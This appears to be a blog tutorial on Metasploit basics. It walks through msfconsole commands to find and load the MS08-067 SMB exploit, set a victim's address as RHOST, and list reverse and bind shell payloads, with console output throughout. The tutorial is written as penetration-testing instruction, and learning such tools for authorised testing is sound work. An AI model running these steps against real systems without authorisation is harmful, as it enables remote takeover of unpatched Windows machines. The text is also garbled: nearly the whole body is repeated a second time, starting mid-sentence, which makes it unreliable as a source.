After discussing intelligence gathering phase and vulnerability
scanning in my previous tutorials, now we focus on the basics of
exploitation.Now we exploits operate against the vulnerabilities that
you discover during a penetration test.
Here we are going to show how utilizing the framework for
exploit development allows you to concentrate on what is unique about
the exploit, and makes other matters such as payload, encoding, nop
generation, and so on.
The Metasploit Framework contains hundreds of modules, and it’s nearly
impossible to remember them all. Running show from msfconsole will
display every module available in the Framework,
msf> show exploits
This command will display every currently available exploit within the
Framework.
msf> show options
When you run show options while a module is selected,
Metasploit will display only the options that apply to that particular
module.
Now let's start with example...
Open msfconsole(type msfconsole in terminal). When msfconsole is loaded,
if you want to launch an attack against SQL, type :
msf > search mssql
Or if you find the MS08-067 exploit specifically,
msf > search ms08_067
Then, having found an exploit , you could load the found module with
the use command :
msf > use windows/smb/ms08_067_netapi
Now we can enter show
options to display the options specific to the MS08-067 exploit:
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
As you can see, this exploit required victim's IP address.
You can set RHOST to specific target IP address(192.168.1.1) :
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
Now when you give command show options again then :
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1 The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
As you can see now your target is set.
msf> show payloads :
As with show options, when you run show payloads from a
module-specific prompt, Metasploit displays only the payloads that are
compatible with that module.
To see an active list of payloads, run the following command:
msf> show payloads
if you are in an actual exploit, you will see only payloads applicable
to the attack.
For example, running show payloads from the msf exploit(ms08_067_netapi)
prompt would result in the output shown next.
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
. . . SNIP . . .
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP
Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP
Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP
Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP
Inline
scanning in my previous tutorials, now we focus on the basics of
exploitation.Now we exploits operate against the vulnerabilities that
you discover during a penetration test.
Here we are going to show how utilizing the framework for
exploit development allows you to concentrate on what is unique about
the exploit, and makes other matters such as payload, encoding, nop
generation, and so on.
The Metasploit Framework contains hundreds of modules, and it’s nearly
impossible to remember them all. Running show from msfconsole will
display every module available in the Framework,
msf> show exploits
This command will display every currently available exploit within the
Framework.
msf> show options
When you run show options while a module is selected,
Metasploit will display only the options that apply to that particular
module.
Now let's start with example...
Open msfconsole(type msfconsole in terminal). When msfconsole is loaded,
if you want to launch an attack against SQL, type :
msf > search mssql
Or if you find the MS08-067 exploit specifically,
msf > search ms08_067
Then, having found an exploit , you could load the found module with
the use command :
msf > use windows/smb/ms08_067_netapi
Now we can enter show
options to display the options specific to the MS08-067 exploit:
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
As you can see, this exploit required victim's IP address.
You can set RHOST to specific target IP address(192.168.1.1) :
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
Now when you give command show options again then :
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1 The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
As you can see now your target is set.
msf> show payloads :
As with show options, when you run show payloads from a
module-specific prompt, Metasploit displays only the payloads that are
compatible with that module.
To see an active list of payloads, run the following command:
msf> show payloads
if you are in an actual exploit, you will see only payloads applicable
to the attack.
For example, running show payloads from the msf exploit(ms08_067_netapi)
prompt would result in the output shown next.
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
. . . SNIP . . .
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP
Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP
Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP
Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP
Inline
No comments:
Post a Comment